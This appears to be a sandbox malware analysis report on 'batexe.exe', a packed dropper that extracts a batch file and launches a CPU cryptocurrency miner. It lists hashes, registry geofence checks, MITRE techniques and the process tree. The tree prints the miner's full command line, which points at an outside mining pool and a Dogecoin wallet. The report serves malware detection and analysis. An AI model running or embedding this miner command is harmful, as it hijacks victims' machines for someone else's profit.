73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
299s
platform
windows10-2004_x64
resource
win10v2004-20231222-ja
resource tags

arch:x64arch:x86image:win10v2004-20231222-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
18/02/2024, 02:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
2152	b2e.exe
4656	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4656	cpuminer-sse2.exe
4656	cpuminer-sse2.exe
4656	cpuminer-sse2.exe
4656	cpuminer-sse2.exe
4656	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4284-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4284 wrote to memory of 2152	4284	batexe.exe	84
PID 4284 wrote to memory of 2152	4284	batexe.exe	84
PID 4284 wrote to memory of 2152	4284	batexe.exe	84
PID 2152 wrote to memory of 4432	2152	b2e.exe	85
PID 2152 wrote to memory of 4432	2152	b2e.exe	85
PID 2152 wrote to memory of 4432	2152	b2e.exe	85
PID 4432 wrote to memory of 4656	4432	cmd.exe	88
PID 4432 wrote to memory of 4656	4432	cmd.exe	88

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4284
- C:\Users\Admin\AppData\Local\Temp\9599.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\9599.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\9599.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2152
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9887.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4432
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4656

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\9599.tmp\b2e.exe

Filesize
6.0MB

MD5
bf4b8a2cf6cc4884a46fe3c71ac85d96

SHA1
8c63b2e2f98fddf39be610b13170677e9e67af0a

SHA256
06e5d1d0f2a9a3d919acb75597ba45f789bbba4b27e10b13016d466c5156b36d

SHA512
ec3ba26bca604855243d6fb723c4cae62051d965dc1b7c0f32b49963ea2181e9f7d40c6e7ae21ce5eb12c76b685c251f2353323e46247bded53e11ab18a2010c

Download Submit
C:\Users\Admin\AppData\Local\Temp\9599.tmp\b2e.exe

Filesize
3.2MB

MD5
2f5a636ae0d5310b24e4b56257d5c64b

SHA1
f935910070cc2560455d9d1cfc47e215340da935

SHA256
2834cbd3b13d7c0131de15ac110767db54c4601e700eb2cae30986f958b9c13a

SHA512
ad67a5a33f158b4811ddbc6e69d5d4c7c0749ec410883fa8bdd1df56faa9b42c9e6fe47b9a342dc25ea9de4ca1883b02e3f90cdc4dce94458f5ccd8a1772308b

Download Submit
C:\Users\Admin\AppData\Local\Temp\9599.tmp\b2e.exe

Filesize
3.1MB

MD5
f16be8d5f1fea151880bf9fd3fb5f8d8

SHA1
b600e5361b329dacb30222710fe08983c9597f3e

SHA256
e247e976e3ed1121054bcaef91c7614e7d5405df39d3d34458a1efcb7cd4b4b5

SHA512
6482a24b9762a5c647e94c8334e0924fd2640e894d11bb45e715131c670e35723a1500b1e417115f083a14db4d5253f9b598c2f34b3be59e006b154fbb593487

Download Submit
C:\Users\Admin\AppData\Local\Temp\9887.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
73KB

MD5
bb63a3183a19f6825efe8ea3290d359a

SHA1
88b9a976fc07b5e575416222622efdd375f1e435

SHA256
170340e8e4e654c7c9e3e1602e03400aab5a312c91828344e47450886e3132f6

SHA512
abc1072bab8dfad116a409f958f6e11b4003a1997a766a5b4ef69a72eb17bbc6048c266b1f58283c1bd415556b38ee20fa6b42d59bc2173bd70bc2de9942d58e

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.6MB

MD5
68b9ac5ae90127c74273f1cef7595a9e

SHA1
65958596f7fe21ea3e238c100800d787c3d21dbd

SHA256
1ad13e424fca379121bb202175bf2aa3435689f277211efe47db641baee60714

SHA512
7cd043504e0ac675c3b73aaf5c2614f570d9b9ba765e5d4eb256d441e06f2e3cce2d01004b6888b40fd65c656a3a422a662f547e0ed48a2c5b45ca4823ff1ec7

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
276KB

MD5
2f8072fa09a691fd21bc5254daf5cedc

SHA1
124241b997a8a9c89cda818f0726725c68056b95

SHA256
57a8815b45fa05d733a7ea88b2b089504449fca4fd03f104a612c56a39cfd225

SHA512
13b6db6676bd732ae81da8b210e303003679fe281b01e0e77c23aef661f59174969ae4f35ef3c3b7b08c0e48dc2cfd06307477c28bc8af950fc25c484433ce4d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
146KB

MD5
32a9d48c0f44b9f23763088f4f04fdd8

SHA1
c8c2d596560f2253cc6f03fb3fdb7d1008a8a5f5

SHA256
245664a97edf10269747f314bd2b289633f6fb27dc10ff448278920d3f6d6ba9

SHA512
45536ba50b28e125ffe1a56df414873e762e1a316f5f6924ad72fec928933db40d763b60ed7f72d055db33d8292ea8f1ef0c97ffd4a737f3beafdc7399f15474

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
97KB

MD5
cfdc029c127be7c6d796f1fe51f230ee

SHA1
458dae03480d55748e16fc92d797cfc71d1876fb

SHA256
d52542d087d70ccccf3a318ef18361068617c17c0fb3710eb08007e33bb951ca

SHA512
b362a5c952b38e37b3d97614511872e25b3991b445bfb91a80d847887ce534fe371629cd672eb40d7848482292f7cc34196a937fa9b6c2e8f3d834c2e667a677

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
235KB

MD5
69560f6e52aa2426182ce50004a604a0

SHA1
3e863ebbc2f149207840e9f899b6c5d44269d40a

SHA256
4a4f1f021303f8f26d202bc88a018156b0ec20f7690ba72ad4fe4a5518ebdffc

SHA512
2e0bc1cb0f6adf01a5701f3c2fc7044d4d416e8c578bc03e7353b27b9b443234318062840058f401aae31d6bd3f6dfef4b5551c6ba2e124051399890b8a7adb5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
128KB

MD5
9746d1ac79c8b499d8b2224394581fa7

SHA1
36b1985eabfd8131ad9f2b7f69c903a3fce67629

SHA256
77941fbe96e0c797e6cf5419ee32bd3fcee69629cba37750146656a660c37182

SHA512
61a6174e2aced5b85cd614ad2f9d3da24c6b91e1fc04e10ff818222c4323cd043a59708bd35af0de84b004bf492fbc157d72907cd1e7ddf7082fc2a3563ef183

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
75KB

MD5
952cea2e2fe6601730acae073a5b380e

SHA1
3ddd3baf4ca6693b7da0aa907759262a276c2e73

SHA256
8ae64cd179fc48e04467e0acb0bffa002cbe1a8486869dd434a7bb68099193be

SHA512
4c320fda66ddae255590b9ef68dd1d27f8cdaa72a47142c949a1d74556d6e80db7edebdc504bf08ce01bc611ec459ed23d212fcb7923f2cb75a9ca93ed561531

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
137KB

MD5
045cdcbd6e61b00a830fd204ce8a18bb

SHA1
cb2c10dad495489493c65bacc15723cb23949c81

SHA256
3511c0e6dd0310de14186a1b9565708885128f3e5c43bf21f553ac02da87105f

SHA512
9ad905c120296d739d83af2236809a136840e7223f9e2314d5b7cc39758233ad34e789024ffa878e4e91917dcad7f8110b219b2a3b478e7e41c693813ace8855

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
104KB

MD5
cc50156d42132d386c43799974211bba

SHA1
d6841746a0683d67dc28b907ed92510631b9ffcb

SHA256
0b88d6c71f5fe97d7e7ed9d831933930c33b074eeaddb7b730beb6cdcf254dd3

SHA512
6ba4479eb8a6127a004e0d0e87a57cb0716431fcfa42b621ce126632ae49bcb20a7a1f0d754da36ed8d96cee3078ca54801937d51f6d44663950e327978e3f5e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
168KB

MD5
e929c2e1f3bb7002678ca6afc01c113c

SHA1
b107f933d5459199034d5b6a8c1c6015739c4ce1

SHA256
731fad39e6aa208d5a895be748472621a1099f955356c9256348c203f8eca085

SHA512
8513d6d4297ab8b2caf7bb12b5173326c3d6686940d5e5871d25378b22b56223601564b0a74a9458e4b2dc67d28b0dfbd8bea3c97d12b049bbbe0b5e1e323a9c

Download Submit
memory/2152-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2152-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4284-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4656-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4656-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4656-46-0x0000000063360000-0x00000000633F8000-memory.dmp

Filesize
608KB

Download
memory/4656-47-0x0000000001050000-0x0000000002905000-memory.dmp

Filesize
24.7MB

Download
memory/4656-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4656-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4656-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4656-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4656-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4656-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4656-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4656-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4656-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download